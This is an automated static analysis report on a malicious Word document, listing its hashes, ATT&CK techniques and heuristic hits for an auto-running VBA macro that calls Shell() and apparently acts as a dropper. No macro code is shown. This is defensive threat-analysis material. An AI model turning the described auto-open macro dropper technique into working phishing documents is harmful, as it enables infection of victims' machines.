Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 256de76c63fef8f5…

MALICIOUS

Office (OLE)

Size: 133.5 KB
Created: 2018-02-14 22:38:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: f7e808bbbbe7950383052c1578213181
SHA-1: 338ee96fec11697e0b567beaa1ada9c47dfcb83c
SHA-256: 256de76c63fef8f5b66fcde726c0460ca71e958502fe1b1b3298b350e76746fb
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro calls Shell() and is configured to run automatically through the AutoOpen procedure. Taken together, these indicate dropper behaviour: the macro's intent is to download a second-stage payload from a remote source and execute it.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6448961-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6448961-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    The document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA code contains a Shell() call, which launches an external program from the macro.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project defines an AutoOpen procedure, which Word runs automatically when the document is opened.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only macro documents, and documents whose source extraction failed, where no visible VBA source is available.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; by itself it is not a downloader or parser-CVE attribution.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection: see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 25700 bytes
SHA-256: 8279dbee82cf0f386b4ca6124610a096409f2375a9da3f69c96d7c36b3332507
Preview script
First 1,000 lines of the extracted script